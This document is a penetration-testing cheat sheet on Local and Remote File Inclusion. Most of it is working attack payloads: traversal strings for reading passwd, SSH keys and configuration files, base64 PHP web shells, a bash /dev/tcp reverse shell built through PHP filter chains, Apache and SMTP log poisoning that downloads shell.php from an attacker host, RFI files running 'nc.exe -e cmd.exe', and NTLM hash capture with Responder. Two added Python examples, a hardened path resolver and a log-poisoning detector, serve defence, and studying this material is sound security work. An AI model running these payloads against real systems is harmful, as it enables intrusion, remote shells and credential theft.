# File Inclusion (LFI/RFI)

Local File Inclusion (LFI) and Remote File Inclusion (RFI) are vulnerabilities that commonly affect web applications built on a scripting runtime, where a user-supplied value decides which file the application includes or reads.

### Local File Inclusion (LFI) <a href="#local-file-inclusion-lfi" id="local-file-inclusion-lfi"></a>

```shellscript
?page=../
?page=/etc/passwd
?page=../../../../etc/passwd
?page=../../../../../etc/passwd
?page=..././..././..././..././etc/passwd
?page=..//..//..//..//..//etc/passwd
?page=....//....//....//....//etc/passwd
?page=....//....//....//....//....//....//etc/passwd
?page=.....///.....///.....///.....///etc/passwd
?page=../../../../../../../../../../../../../../etc/passwd
?page=..\/..\/..\/..\/etc/passwd
?page=/var/www/html/..//..//..//etc/passwd
?page=/etc/passwd&
?page=/etc/passwd%00
?page=example.php%00.txt
?page=/etc/passwd%00.inc
?page=/etc/passwd%00.php
?page=http://localhost/index
?page=http://localhost:3000/index.html
?page=http://localhost:8000/index.html
?page=somedir/../../../../etc/passwd&ext=

# URL encoding
?page=..%2F..%2F..%2F..%2Fetc/passwd
?page=..%5C..%5C..%5C..%5Cetc/passwd
?page=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
?page=http:%5C%5Cindex

# URL double encoding
?page=..%252F..%252F..%252F..%252fetc/passwd
?page=%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252Fpasswd
?page=http:%252F%252Findex

# UTF-8 encoding
?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

# Dot truncation
?page=../../../../etc/passwd..........................................................

# File scheme
?page=file:///etc/passwd
?page=file:%2F%2F%2Fetc%2Fpasswd
?page=file:%252F%252F%252Fetc%252Fpasswd
?page=file%3A///etc/passwd
?page=file%3A%2F%2F%2Fetc%2Fpasswd
?page=file%3A%252F%252F%252Fetc%252Fpasswd
?page=file://var/www/html/index.php
?page=file://var/www/<subdomain>/index.php

# Other local web server
?page=http://127.0.0.1/
?page=http://127.0.0.1:3000/
?page=http://127.0.0.1:8000/

# PHP Filter
?page=php://filter/resource=/etc/passwd
?page=php://filter/read=string.rot13/resource=index.php
?page=php://filter/convert.base64-encode/resource=index.php
?page=pHp://filter/convert.base64-encode/resource=index.php
?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>

# PHP Filter (Base64 encoding)
# `PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+`: `<?php system($_GET['cmd']); ?>`
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+&cmd=whoami
# `PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=`: `<?php echo system($_GET['cmd']); ?>`
?page=php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4=&cmd=whoami

# PHP Session File
?page=/var/lib/php/sessions/sess_<PHPSESSID>
```
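The list above mixes plain traversal with variants (`....//`, `..//`, double encoding, `%00`, stream wrappers) that exist because of how typical filters fail. The following is an added example, not code from the original page, that models a strip-once filter next to a resolver that rejects every variant; `WEB_ROOT`, `ALLOWED_PAGES` and the payload list are assumptions made for the demo.

```python
"""Added example, not code from the original page: why the traversal variants
listed above get past a strip-once filter, and a resolver that refuses them.
WEB_ROOT, ALLOWED_PAGES and PAYLOADS are assumptions made for this demo."""
import posixpath
from typing import Dict, Optional, Tuple
from urllib.parse import unquote

WEB_ROOT = "/var/www/html/pages"             # hypothetical include directory
ALLOWED_PAGES = {"home", "about", "contact"}  # hypothetical allowlist of page names


def server_decode(raw: str) -> str:
    """The single URL-decode the web server / PHP applies before the app sees $_GET."""
    return unquote(raw)


def naive_resolve(page: str) -> str:
    """Models include("pages/" . str_replace("../", "", $page)).
    "....//" loses its middle "../" and collapses to "../" again; "..//" becomes "/"
    and the join then treats the remainder as an absolute path."""
    cleaned = page.replace("../", "")
    return posixpath.normpath(posixpath.join(WEB_ROOT, cleaned))


def hardened_resolve(page: str) -> Optional[str]:
    """Return the path to include, or None when the request must be refused.
    Checks run from cheapest to most specific: NUL/still-encoded input, then
    schemes and absolute paths, then confinement to WEB_ROOT, then the allowlist."""
    if "\x00" in page or "%" in page:          # %00 truncation, double-encoded input
        return None
    if "://" in page or page.startswith(("/", "\\")):  # php://, file://, http://, absolute
        return None
    if "\\" in page:                            # backslash traversal variants
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, page))
    # normpath keeps the demo offline; a real app should use os.path.realpath()
    # on the live filesystem so a symlink inside WEB_ROOT cannot escape it.
    if not candidate.startswith(WEB_ROOT + "/"):
        return None
    if posixpath.relpath(candidate, WEB_ROOT) not in ALLOWED_PAGES:
        return None
    return candidate


# Constructed inputs: raw ?page= values exactly as they would appear in the URL.
PAYLOADS = [
    "about",
    "../../../../etc/passwd",
    "....//....//....//....//etc/passwd",
    "..//..//..//..//..//etc/passwd",
    "..%252F..%252F..%252F..%252fetc/passwd",
    "/etc/passwd%00",
    "php://filter/convert.base64-encode/resource=index.php",
    "//evil.com/exploit",
]


def evaluate(raw_values=PAYLOADS) -> Dict[str, Tuple[str, Optional[str]]]:
    """Map each raw value to (path the naive include opens, hardened decision)."""
    results = {}
    for raw in raw_values:
        decoded = server_decode(raw)
        results[raw] = (naive_resolve(decoded), hardened_resolve(decoded))
    return results


if __name__ == "__main__":
    for raw, (naive, hard) in evaluate().items():
        print(f"{raw!r:58} naive -> {naive}\n{'':58} hardened -> {hard}")
```

Running it shows the strip-once filter accidentally stopping the plain `../../../../etc/passwd` while `....//` and `..//` still resolve to `/etc/passwd`; the hardened resolver returns `None` for every variant and only ever returns a path for an allowlisted name under `WEB_ROOT`.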

To automate this process, we can fuzz the parameter with a wordlist as follows.

```shellscript
ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
ffuf -u http://example.com/?page=FUZZ -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
```

#### Abuse Server Misconfiguration <a href="#abuse-server-misconfiguration" id="abuse-server-misconfiguration"></a>

We can also try common paths instead of parameters, abusing a misconfigured alias on the server.

```shellscript
/images/../etc/passwd
/images/../../etc/passwd
/images../etc/passwd
/images../../etc/passwd
```

#### Interesting Files <a href="#interesting-files" id="interesting-files"></a>

When our payload is successful, we can additionally investigate local files and retrieve sensitive information.

```shellscript
# Home directories
?page=/home/<username>/.bashrc
?page=/home/<username>/.bash_history
?page=/home/<username>/.bash_logout
?page=/home/<username>/.bash_profile
?page=/home/<username>/.profile
?page=/home/<username>/.ssh/id_rsa

# Root directory
?page=/root/.bashrc
?page=/root/.bash_history
?page=/root/.bash_logout
?page=/root/.bash_profile
?page=/root/.profile
?page=/root/.ssh/id_rsa

# System-wide configurations
?page=/etc/bash.bashrc

# OS
?page=/etc/lsb-release
?page=/etc/os-release

# Processes
?page=/proc/net/tcp
?page=/proc/self/cmdline
?page=/proc/self/environ
?page=/proc/self/fd/0
?page=/proc/self/fd/1
?page=/proc/<pid>/cmdline
?page=/proc/<pid>/environ

# Mail
?page=/var/mail/<username>
?page=/var/spool/mail/<username>
# Postfix
?page=/var/log/mail.log
?page=/var/log/maillog

# Host
?page=/etc/hosts
?page=/etc/hostname
# Cron
?page=/etc/crontab

# Web root
?page=/var/www/html/index.html
?page=/var/www/html/index.php
?page=/var/www/html/.htaccess
?page=/var/www/html/.htpasswd
?page=/var/www/example.com/index.php
?page=/var/www/subdomain/index.php
?page=/var/www/subdomain.example.com/index.php
?page=/var/www/wordpress/index.php
?page=/home/<username>/app/index.html
?page=/home/<username>/webapp/index.html

# Apache
?page=/etc/apache2/.htpasswd
?page=/etc/apache2/apache2.conf
?page=/etc/apache2/envvars
?page=/etc/apache2/ports.conf
?page=/etc/apache2/sites-available/domain.conf
?page=/etc/apache2/sites-available/example.com.conf
?page=/etc/apache2/sites-available/sub.example.com.conf
?page=/etc/apache2/sites-available/sub.conf
?page=/etc/apache2/sites-enabled/000-default.conf
?page=/etc/apache2/sites-enabled/domain.conf
?page=/etc/apache2/sites-enabled/example.com.conf
?page=/etc/apache2/sites-enabled/sub.example.com.conf
?page=/etc/apache2/sites-enabled/sub.conf
?page=/var/log/apache/access.log
?page=/var/log/apache/error.log
?page=/var/log/apache2/access.log
?page=/var/log/apache2/error.log

# Apache Tomcat
?page=/opt/tomcat/conf/tomcat-users.xml
?page=/opt/tomcat/logs/catalina.err
?page=/opt/tomcat/logs/catalina.out

# Nginx
?page=/var/log/nginx/access.log
?page=/var/log/nginx/error.log
?page=/etc/nginx/nginx.conf
?page=/etc/nginx/conf.d/.htpasswd
?page=/etc/nginx/conf.d/example.com.conf
?page=/etc/nginx/conf.d/example.conf
?page=/etc/nginx/conf.d/subdomain.example.com.conf
?page=/etc/nginx/conf.d/subdomain.conf
?page=/etc/nginx/sites-available/default
?page=/etc/nginx/sites-available/example.com.conf
?page=/etc/nginx/sites-enabled/default
?page=/etc/nginx/sites-enabled/example.com.conf
?page=/usr/local/nginx/conf/nginx.conf
?page=/usr/local/etc/nginx/nginx.conf

# PHP web conf (x.x is specified PHP version)
?page=/etc/php/x.x/apache2/php.ini
?page=/etc/php/x.x/cli/php.ini
?page=/etc/php/x.x/fpm/php.ini

# Flask
?page=index.html
?page=../__init__.py
?page=../app.py
?page=../db.py
?page=../main.py
?page=/home/<username>/<appname>/app.py
?page=/opt/<appname>/app.py
?page=/srv/<appname>/app.py

# BIND
?page=/etc/bind/named.conf
?page=/etc/bind/named.conf.options
?page=/etc/bind/named.conf.local
?page=/etc/bind/named.conf.default-zones

# Windows
?page=C:/Windows/debug/NetSetup.log
?page=C:/Windows/System32/drivers/etc/hosts
?page=C:/Windows/System32/inetsrv/config/applicationHost.config
?page=../../../../../../../../windows/system32/drivers/etc/hosts
?page=C:/Users/Public/Desktop/desktop.ini
?page=C:/Users/FUZZ/Desktop/desktop.ini # user enumeration
?page=C:/inetpub/wwwroot/<project>/web.config
?page=C:/xampp/apache/conf/httpd.conf
?page=C:/xampp/apache/conf/extra/httpd-userdir.conf
?page=C:/xampp/apache/conf/extra/httpd-vhosts.conf
?page=C:/xampp/apache/conf/extra/httpd-xampp.conf
?page=C:/xampp/apache/conf/extra/httpd-ajp.conf
?page=C:/xampp/apache/logs/access.log
?page=C:/xampp/apache/logs/error.log
?page=C:/xampp/cgi-bin/example.cgi
?page=C:/xampp/htdocs/example.com/index.php
?page=C:/xampp/htdocs/sub.example.com/index.php
?page=C:/xampp/phpMyAdmin/index.php
?page=C:/xampp/phpMyAdmin/config.inc.php
```

#### Using Curl <a href="#using-curl" id="using-curl"></a>

If we want to test the URL path rather than a parameter, `curl` can be used with the option `--path-as-is`, which stops curl from squashing the `../` sequences before the request is sent:

```shellscript
curl --path-as-is http://example.com/../../../../etc/passwd
```

#### Read Process Commands <a href="#read-process-commands" id="read-process-commands"></a>

We can retrieve commands that start processes by enumerating **`/proc/PID/cmdline`**.\
Create a Python script that enumerates them. We can refer to [this blog post](https://notes.huskyhacks.dev/blog/tryhackme-takedown-walkthrough-v1)'s "This leaves the server vulnerable to Local File Inclusion." section.

```python
# lfi.py
import requests
import time

# Enumerate /proc/<pid>/cmdline through the vulnerable parameter.
# The pid must be formatted into the URL as text; "str" + int raises a TypeError.
for i in range(10):
    print(f"[+] Trying {i}")
    url = f"http://example.com/?file=/proc/{i}/cmdline"
    resp = requests.get(url)
    print(resp.content)
    time.sleep(1)
```

Then execute this file.

```shellscript
python3 lfi.py
```

### Remote File Inclusion (RFI) <a href="#remote-file-inclusion-rfi" id="remote-file-inclusion-rfi"></a>

```shellscript
?page=//evil.com/exploit
?page=%2F%2fevil.com/exploit
?page=%2C%2Cevil.com/exploit
?page=http://evil.com/exploit
?page=http%3A//evil.com/exploit
?page=http%3A%2F%2Fevil%2Ecom/exploit
?page=http%253A%252F%252Fevil%252Ecom/
?page=test@sub.example.com/
```

#### Steal NTLM Hashes (Windows) <a href="#steal-ntlm-hashes-windows" id="steal-ntlm-hashes-windows"></a>

If the website is hosted on Windows, we may be able to capture NTLM password hashes using **Responder**.\
On the local machine, start Responder.

```shellscript
# -I: Interface e.g. eth0, tun0, etc.
sudo responder -I tun0
```

Then send a request to **`https://example.com/?page=//<local-ip>/test`**.\
Now we may be able to capture the hashes.\
If so, we can crack them using **JohnTheRipper** or **Hashcat**. Please refer to [this page](https://exploit-notes.hdks.org/exploit/cryptography/algorithm/ntlm-ntlmv2/) for cracking NTLM.

### Remote Code Execution (RCE) <a href="#remote-code-execution-rce" id="remote-code-execution-rce"></a>

[php\_filter\_chain\_generator](https://github.com/synacktiv/php_filter_chain_generator) is a CLI tool that generates a PHP filter chain payload, which lets a file inclusion be turned into RCE.\
Below is the payload for a reverse shell.

```
wget https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py
python3 php_filter_chain_generator.py --chain "<?php system('bash -c \"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1\"')?>"
```

Then copy the output and paste it to the target.

### Log Poisoning <a href="#log-poisoning" id="log-poisoning"></a>

#### 1. Check if You Can Access the Apache Log File <a href="#id-1-check-if-you-can-access-the-apache-log-file" id="id-1-check-if-you-can-access-the-apache-log-file"></a>

```shellscript
# Debian, Ubuntu Linux
/?page=/var/log/apache/access.log
/?page=../../../../var/log/apache/access.log
/?page=/var/log/apache2/access.log
/?page=../../../../var/log/apache2/access.log

# FreeBSD Linux
/?page=/var/log/httpd-access.log
/?page=../../../../var/log/httpd-access.log

# CentOS, Fedora, RedHat Linux
/?page=/var/log/httpd/access_log
/?page=../../../../var/log/httpd/access_log
```

#### 2. Prepare the Payload for PHP Reverse Shell <a href="#id-2-prepare-the-payload-for-php-reverse-shell" id="id-2-prepare-the-payload-for-php-reverse-shell"></a>

```shellscript
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# Edit the values in the payload
$ip = '<attacker-ip>';
$port = 4444;
```

#### 3. Open Web Server in Local Machine <a href="#id-3-open-web-server-in-local-machine" id="id-3-open-web-server-in-local-machine"></a>

```
python -m http.server 80
```

#### 4. Inject PHP Payload in the User-Agent <a href="#id-4-inject-php-payload-in-the-user-agent" id="id-4-inject-php-payload-in-the-user-agent"></a>

Send the GET request with the PHP payload in the User-Agent header.\
When the log is later included, the payload fetches `shell.php` from our web server and writes it to **`/shell.php`** on the target website.

```
GET / HTTP/1.1
...
User-Agent: <?php file_put_contents('shell.php', file_get_contents('http://<attacker-ip>/shell.php'));  ?>
```

If we get an error such as **"500 Internal Server Error"** in the next steps, try modifying the payload a bit. For example,

* Change single quotes (**'**) to double quotes (**"**).
* Change double quotes (**"**) to single quotes (**'**).
* Change **`<?php`** to **`<?pHp`**. (PHP filter bypass)

#### 5. Apply the Injection <a href="#id-5-apply-the-injection" id="id-5-apply-the-injection"></a>

Refresh the page **`/index.php?page=../../../../var/log/apache2/access.log`** .

#### 6. Open Listener for Reverse Shell <a href="#id-6-open-listener-for-reverse-shell" id="id-6-open-listener-for-reverse-shell"></a>

On your local machine, open the listener.\
Specify the port you set in step 2.

```
nc -lvnp 4444
```

#### 7. Gain Access to Shell <a href="#id-7-gain-access-to-shell" id="id-7-gain-access-to-shell"></a>

Access **`/shell.php`** on the target website.\
If it goes well, you get a shell.

### SMTP Log Poisoning <a href="#smtp-log-poisoning" id="smtp-log-poisoning"></a>

Reference: <https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/>

If the target system exposes SMTP and we can read the mail logs through the LFI, we may inject arbitrary code into the mail log and escalate to RCE.

#### 1. Check Log Files with LFI <a href="#id-1-check-log-files-with-lfi" id="id-1-check-log-files-with-lfi"></a>

Below are examples of log file locations:

```shellscript
# Exim
?page=/var/log/exim_mainlog
?page=/var/log/exim/main.log

# Postfix
?page=/var/log/mail.log
?page=/var/log/maillog
?page=/var/adm/maillog
?page=/var/adm/syslog/mail.log
```

#### 2. Send an Email Containing the Payload via the SMTP Server <a href="#id-2-send-email-included-rce-via-smtp-server" id="id-2-send-email-included-rce-via-smtp-server"></a>

```shellscript
# 1. Connect to the SMTP server
telnet x.x.x.x 25

# 2. Check existing account
vrfy root
250 2.0.0 root
vrfy admin
250 2.0.0 admin
vrfy administrator
250 2.0.0 administrator
...

# 3. Send an email containing arbitrary code
MAIL FROM: support@victim.com
RCPT TO: <?php system($_GET['cmd']); ?>
```

#### 3. Achieve RCE with LFI <a href="#id-3-achieve-rce-with-lfi" id="id-3-achieve-rce-with-lfi"></a>

Now go back to the vulnerable web page and send an LFI request such as the one below:

```
/?page=/var/log/mail.log&cmd=whoami
```

If the result of the system command is displayed in the response, we can execute other commands (e.g. to get a reverse shell).
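Both chains, the Apache log poisoning via User-Agent and the SMTP log poisoning via `RCPT TO`, leave the same two traces: a PHP open tag written into a log, and an include request that names a log file or a stream wrapper. The following is an added example, not code from the original page, that runs that detection logic over constructed access-log and mail-log lines; the sample lines, rule names and regexes are assumptions made for the demo, and 203.0.113.10 and 198.51.100.7 are documentation addresses.

```python
"""Added example, not code from the original page: detection logic for the
Apache and SMTP log poisoning chains described above, run over constructed
access-log and mail-log lines. The sample lines, the rule names and the three
regexes are assumptions made for this demo; 203.0.113.10 and 198.51.100.7 are
documentation addresses."""
import re
from typing import Dict, List

# PHP open tags in any log field. Case-insensitive so the "<?pHp" variant
# mentioned in step 4 above and the short tag "<?=" are both caught.
PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)

# Traversal in its plain, backslash, URL-encoded, double-encoded and overlong
# UTF-8 spellings, as listed at the top of the page.
TRAVERSAL = re.compile(r"\.\.(?:/|\\|%2f|%5c)|%2e%2e|%252e%252e|%c0%ae", re.IGNORECASE)

# Log files an attacker would pull back through the include parameter.
LOG_TARGET = re.compile(r"/var/(?:log/|mail/|spool/mail/|adm/)", re.IGNORECASE)

# PHP stream wrappers that should never appear in an include parameter.
WRAPPER = re.compile(r"\b(?:php|data|file|expect|phar)://", re.IGNORECASE)

# Constructed sample: four Apache combined-format lines and two Postfix lines.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.1" 200 12 "-" "<?php file_put_contents('shell.php', file_get_contents('http://198.51.100.7/shell.php')); ?>"
203.0.113.10 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 700 "-" "Mozilla/5.0"
Oct 10 13:58:01 mail postfix/smtpd[2140]: NOQUEUE: reject: RCPT from unknown[203.0.113.10]: 550 5.1.1 <<?pHp system($_GET['cmd']); ?>>: Recipient address rejected
Oct 10 13:58:30 mail postfix/smtpd[2140]: connect from unknown[203.0.113.10]
"""


def scan(lines) -> List[Dict[str, object]]:
    """Return one finding per (line, rule) hit. A PHP tag anywhere in a log is the
    poisoning write; a traversal that names a log file, or a stream wrapper, is
    the read that turns the poisoned entry into code execution."""
    findings = []
    for n, line in enumerate(lines, 1):
        tag = PHP_TAG.search(line)
        if tag:
            findings.append({"line": n, "rule": "php-tag-in-log", "evidence": tag.group(0)})
        if TRAVERSAL.search(line) and LOG_TARGET.search(line):
            findings.append({"line": n, "rule": "log-file-include",
                             "evidence": LOG_TARGET.search(line).group(0)})
        wrapper = WRAPPER.search(line)
        if wrapper:
            findings.append({"line": n, "rule": "php-wrapper-include", "evidence": wrapper.group(0)})
    return findings


def summarize(findings) -> Dict[str, int]:
    """Count of findings per rule, the shape an alert threshold or dashboard wants."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f"line {h['line']}: {h['rule']} ({h['evidence']})")
    print(summarize(hits))
```

The `php-tag-in-log` rule is the one worth alerting on by itself: a PHP open tag has no legitimate reason to appear in a User-Agent, a request path or an SMTP recipient, and it fires on the write before any include request is made. The other two rules fire on the read and are useful as confirmation that a poisoned entry is being pulled back through the vulnerable parameter.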

### References <a href="#references" id="references"></a>

* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion)

### Tools

```bash
# https://github.com/kurobeats/fimap
fimap -u "http://10.11.1.111/example.php?test="
# https://github.com/P0cL4bs/Kadimus
./kadimus -u localhost/?pg=contact -A my_user_agent
# https://github.com/wireghoul/dotdotpwn
dotdotpwn.pl -m http -h 10.11.1.111 -M GET -o unix
# Apache specific: https://github.com/imhunterand/ApachSAL
```

{% hint style="info" %}
**How to**

1. Look for requests with a filename-like parameter, e.g. `include=main.inc template=/en/sidebar file=foo/file1.txt`
2. Modify and test: `file=foo/bar/../file1.txt`
   1. If the response is the same, it could be vulnerable
   2. If not, there is some kind of block or sanitizer
3. Try to access world-readable files like `/etc/passwd` or `/win.ini`
{% endhint %}

### LFI

```bash
# Basic LFI
curl -s http://10.11.1.111/gallery.php?page=/etc/passwd

# If LFI, also check
/var/run/secrets/kubernetes.io/serviceaccount

# PHP Filter b64
http://10.11.1.111/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd && base64 -d savefile.php
http://10.11.1.111/index.php?m=php://filter/convert.base64-encode/resource=config
http://10.11.1.111/maliciousfile.txt%00?page=php://filter/convert.base64-encode/resource=../config.php
# Nullbyte ending
http://10.11.1.111/page=http://10.11.1.111/maliciousfile%00.txt
http://10.11.1.111/page=http://10.11.1.111/maliciousfile.txt%00
# Other techniques
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd
https://abc.redact.com/static/../../../../../../../../../../../../../../../etc/passwd
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.html
https://abc.redact.com/asd.php?file:///etc/passwd
https://abc.redact.com/asd.php?file:///etc/passwd%00
https://abc.redact.com/asd.php?file:///etc/passwd%00.html
https://abc.redact.com/asd.php?file:///etc/passwd%00.ext
https://abc.redact.com/asd.php?file:///..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.ext/etc/passwd
https://target.com/admin..;/
https://target.com/../admin
https://target.com/whatever/..;/admin
https://target.com/whatever.php~
# Cookie based
GET /vulnerable.php HTTP/1.1
Cookie:usid=../../../../../../../../../../../../../etc/passwd
# LFI Windows
http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini
http://10.11.1.111/addguestbook.php?LANG=../../../../../../../../../../../../../../../boot.ini
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=file:///C:/boot.ini
http://10.11.1.111/addguestbook.php?LANG=file:///C:/win.ini
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.ext
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.ext

# LFI using video upload:
https://github.com/FFmpeg/FFmpeg
https://hackerone.com/reports/226756
https://hackerone.com/reports/237381
https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit
https://github.com/neex/ffmpeg-avi-m3u-xbin

# Contaminating log files
root@kali:~# nc -v 10.11.1.111 80
10.11.1.111: inverse host lookup failed: Unknown host
(UNKNOWN) [10.11.1.111] 80 (http) open
 <?php echo shell_exec($_GET['cmd']);?> 
http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig

# Common LFI to RCE:
    Using file upload forms/functions
    Using the PHP wrapper expect://command
    Using the PHP wrapper php://file
    Using the PHP wrapper php://filter
    Using PHP input:// stream
    Using data://text/plain;base64,command
    Using /proc/self/environ
    Using /proc/self/fd
    Using log files with controllable input like:
        /var/log/apache/access.log
        /var/log/apache/error.log
        /var/log/vsftpd.log
        /var/log/sshd.log
        /var/log/mail

# LFI possibilities by filetype
    ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
    SVG: Stored XSS / SSRF / XXE
    GIF: Stored XSS / SSRF
    CSV: CSV injection
    XML: XXE
    AVI: LFI / SSRF
    HTML / JS : HTML injection / XSS / Open redirect
    PNG / JPEG: Pixel flood attack (DoS)
    ZIP: RCE via LFI / DoS
    PDF / PPTX: SSRF / BLIND XXE
    
# Chaining with other vulns    
../../../tmp/lol.png —> for path traversal
sleep(10)-- -.jpg —> for SQL injection
<svg onload=alert(document.domain)>.jpg/png —> for XSS
; sleep 10; —> for command injections

# 403 bypasses
/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#
/secret/
/secret/.
//secret//
/./secret/..
/admin..;/
/admin%20/
/%20admin%20/
/admin%20/page
/%61dmin

# Path Bypasses
# 16-bit Unicode encoding
# double URL encoding
# overlong UTF-8 Unicode encoding
....//
....\/
..../\
....\\
```

### RFI

```bash
# RFI:
http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00
Content of evil.txt:
<?php echo shell_exec("nc.exe 10.11.0.105 4444 -e cmd.exe") ?>
# RFI over SMB (Windows)
cat php_cmd.php
    <?php echo shell_exec($_GET['cmd']);?>
# Start SMB Server in attacker machine and put evil script
# Access it via browser (2 request attack):
# http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe"
# http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234

# Cross Content Hijacking:
https://github.com/nccgroup/CrossSiteContentHijacking
https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
http://50.56.33.56/blog/?p=242

# Encoding scripts in PNG IDAT chunk:
https://yqh.at/scripts_in_pngs.php
```
